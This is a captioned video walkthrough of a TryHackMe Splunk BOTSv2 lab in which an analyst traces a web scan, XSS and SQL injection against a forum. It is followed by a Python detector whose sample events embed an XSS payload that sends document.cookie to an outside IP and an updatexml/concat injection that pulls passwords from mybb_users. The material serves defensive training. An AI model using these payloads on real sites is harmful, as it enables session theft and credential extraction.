Splunk 2 Boss of the SOC (BOTS) - 200 Series | TryHackMe | Splunk Analysis

Video Statistics and Information

Captions
Hey everybody, my name is Ron, and welcome to my walkthrough of the Splunk 2 Task 4 200 series questions. In this video we'll be using Splunk to see what events happened when cross-site scripting and SQL injections took place. Now, hopefully you'll find this content useful and it helps you better understand Splunk. My mission here is not just to reinforce my own learning but also to help you all grasp these concepts more clearly. Whether you're just starting out or looking to sharpen your skills, this walkthrough is crafted to guide you step by step. And hey, if you found this content valuable, hit that like button and subscribe. And without further ado, let's get started.

Now let's go ahead and start Task 4, 200 series questions. We'll still be using the index botsv2, and for question one we'll be using "amber" and "tor". Question one: what version of Tor Browser did Amber install to obfuscate her web browser? So let's go ahead and plug in those terms, let's make sure that we choose All time, and click the search button. Once the results populate, let's go under Interesting Fields and look at Image. At the top we'll clearly see that the version of Tor that Amber installed was 7.0.4. In Splunk, the term "Image" doesn't refer to a picture or a graphic; instead, within the context of Splunk, it often refers to a binary executable or a process image that has been loaded or executed on the system.

Next question: what is the public IPv4 address of the server running www.brewertalk.com? So let's go back to the search function and type in site=www.brewertalk.com. Once the results populate, let's look under Interesting Fields at destination IP, and we'll see that there are only two values showing up. Remember that IP addresses starting with 172 are part of the private IP address range, so our only other option is 52.42.208.228.

Okay, next question: provide the IP address of the system used to run a web vulnerability scan against brewertalk.com. Let's look at the hint: which IP is hitting the hardest? So, going back to our search, let's go under Interesting Fields and look for source IP, and it seems like this IP address starting with 45 has a high count of 8,965. So let's check that out. Now that the results have populated, take a look at the first result. One thing you'll notice here is there's a lot more activity being recorded. For example, on the first result, under form data, you see something interesting happening, and its destination is brewertalk's private IP address. If we look at another event, we see the destination IP being brewertalk's private IP address, something fishy going on under form data, and it is coming from 45.77.65.211. And if you continue to browse through the results, there's a lot of suspicious activity happening with this IP address. So the IP address used to run a web vulnerability scan is 45.77.65.211.

Next question: the IP address from question 2 is also being used by a likely different piece of software to attack a URI path. What is the URI path? So, off the bat, let's go under Interesting Fields and look at URI path, and we'll see the top value being hit was member.php. But since we're looking for the IP address we talked about in question two, let's go ahead and verify that. So what we notice here is that there are only three events, and if we look at form data it seems that something fishy is going on here. It seems that a script is being injected, the location of the document is coming from this IP address, the JavaScript code is being redirected here, and it is appending document.cookie. So, from the looks of it, this URI query is an attempt at a cross-site scripting attack. It seems like the attacker is trying to inject a script that, when executed, will redirect the user to their server at 45.77.65.211 on port 999 and send along the cookies of the current web page as a "metric" parameter. So the URI in question is member.php.

Next question: what SQL function is being abused on the URI path from the previous question? So if we look at our first result, let's look under form data. What we'll see is they used the updatexml and concat functions to extract data from the database; specifically, they're trying to retrieve the password of a user from mybb_users. The user that's being registered is macmin, the password they'll be using is mukaram, the email that's being used is mac@live.com, and they'll be abusing updatexml and concat. And if we look at the source content, we'll see the SQL injection attempt.

Next question: what was the value of the cookie that Kevin's browser transmitted to the malicious URL as part of a cross-site scripting attack? So let's check out the hint: XSS is associated with what tag? Since we'll be looking for Kevin, let's go ahead and copy his name. Let's go ahead and clear this search, put in "kevin", and since we're looking for a cookie, why not type in "cookie". So under Interesting Fields let's look at cookie, and we'll see that there are only a few values. Now, we know that cookies are supposed to be unique, but we see two cookies here with nearly the same data, so we can assume that this is where the cross-site scripting attack took place. To verify that, let's go ahead and check out this value and browse the results. If you look at the destination headers, we'll see that this is where the cross-site scripting is taking place. We'll see that they're making a new username by the name of kIagerfield with a password "your laws". Now, this content is also the answer to the next question, but we'll approach that a little bit differently.

Next question: what brewertalk.com username was maliciously created by a spear phishing attack? Hint: the attacker stole Kevin's CSRF token and performed a trick from the domain squatters by using the homograph attack. So what we can do here is just copy this token, and we'll notice that there are only nine events. Now, since we know that a user is being created, typically you have to submit a form, so we can look at Interesting Fields and let's look at form data. We only have one value here, and as we can see, the username kIagerfield with a password "beer lulls" is being created. So that is it for the Task 4 200 series questions, and if you found this video helpful, give me a thumbs up and hit that subscribe button. Thank you for watching, and see you on the next one.
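The two findings the walkthrough reaches by eyeballing the form data field (a script that redirects the victim to the attacker's host with document.cookie tacked on, and an updatexml()/concat() error-based injection aimed at mybb_users) can be checked mechanically over the same kind of events. The following Python is an added example written for this page; it is not code from the video, from TryHackMe or from the BOTSv2 dataset. The sample events are constructed to resemble Splunk stream:http records (the field names src_ip, dest_ip, uri_path and form_data, the internal 172.31.x.x and 10.x.x.x addresses, the port 999 and the payload text are assumptions, and the function names are the editor's own); they reuse the attacker IP, the "metric" parameter and the table name the walkthrough mentions only so the output lines up with the narration.

```python
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus

# Constructed sample events shaped like Splunk stream:http fields (field names are an
# assumption; these are NOT real BOTSv2 records, just payloads modelled on the narration).
SAMPLE_EVENTS = [
    # Ordinary registration from an internal address.
    {"src_ip": "10.0.2.107", "dest_ip": "172.31.4.249", "uri_path": "/member.php",
     "form_data": "username=kevin&password=Summer2017&email=kevin%40example.com&regcheck2=true"},
    # Reflected XSS: redirect the victim to the attacker host, leaking document.cookie as "metric".
    {"src_ip": "45.77.65.211", "dest_ip": "172.31.4.249", "uri_path": "/member.php",
     "form_data": "username=%3Cscript%3Edocument.location%3D%22http%3A%2F%2F45.77.65.211%3A999"
                  "%2F%3Fmetric%3D%22%2Bdocument.cookie%3C%2Fscript%3E"},
    # Error-based SQL injection: updatexml()/concat() used to read a password from mybb_users.
    {"src_ip": "45.77.65.211", "dest_ip": "172.31.4.249", "uri_path": "/member.php",
     "form_data": "username=macmin&password=mukaram&email=mac%40live.com&regcheck1=%27+AND+"
                  "updatexml%281%2Cconcat%280x7e%2C%28SELECT+password+FROM+mybb_users+LIMIT+1%29%29%2C1%29--+-"},
    # Scanner noise from the same source (what drives the high src_ip count).
    {"src_ip": "45.77.65.211", "dest_ip": "172.31.4.249", "uri_path": "/index.php", "form_data": "q=test"},
    {"src_ip": "45.77.65.211", "dest_ip": "172.31.4.249", "uri_path": "/admin/", "form_data": ""},
]

# Indicators, in the order they are reported.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "cookie_access": re.compile(r"document\.cookie", re.I),
    "redirect": re.compile(r"(?:document|window)\.location\b", re.I),
}
SQLI_PATTERNS = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "concat": re.compile(r"\bconcat\s*\(", re.I),
    "union_select": re.compile(r"\bunion\b[\s\S]+?\bselect\b", re.I),
}
# Where an injected script sends the browser: host and optional port.
EXFIL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::(\d+))?")


def decode_form(form_data, max_rounds=3):
    """URL-decode form_data, repeating a bounded number of times so that a
    double-encoded payload (e.g. %2527 for a quote) is not missed."""
    decoded = unquote_plus(form_data)
    for _ in range(max_rounds - 1):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded


def classify_event(event):
    """Return which XSS / SQLi indicators fire on one event, plus the exfil
    destination (host, port) when an injected script redirects somewhere."""
    decoded = decode_form(event.get("form_data", ""))
    xss = [name for name, pat in XSS_PATTERNS.items() if pat.search(decoded)]
    sqli = [name for name, pat in SQLI_PATTERNS.items() if pat.search(decoded)]
    exfil = None
    if xss:
        m = EXFIL_RE.search(decoded)
        if m:
            exfil = (m.group(1), int(m.group(2)) if m.group(2) else None)
    return {"src_ip": event.get("src_ip"), "uri_path": event.get("uri_path"),
            "xss": xss, "sqli": sqli, "exfil": exfil, "decoded": decoded}


def suspicious_events(events):
    """Only the events where at least one indicator fired."""
    return [c for c in map(classify_event, events) if c["xss"] or c["sqli"]]


def top_sources(events):
    """'Which IP is hitting the hardest': src_ip counts, highest first
    (the same pivot as looking at src_ip under Interesting Fields)."""
    return Counter(e["src_ip"] for e in events).most_common()


if __name__ == "__main__":
    for ip, n in top_sources(SAMPLE_EVENTS):
        print(f"{ip:<16} {n} events")
    for c in suspicious_events(SAMPLE_EVENTS):
        kinds = ", ".join(c["xss"] + c["sqli"])
        print(f"{c['src_ip']} -> {c['uri_path']}: {kinds}; exfil={c['exfil']}")
```

The decode step matters: Splunk shows form_data URL-encoded, and a search for the literal string "<script>" or "updatexml(" will miss payloads that arrive as %3Cscript%3E or are encoded twice, which is why the walkthrough has to read the decoded form data by eye. The bounded decode loop gives the same view programmatically without looping forever on a string that never stops changing.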
Info
Channel: RonR1337
Views: 347
Id: hkWLCuDb3d8
Length: 8min 6sec (486 seconds)
Published: Tue Sep 19 2023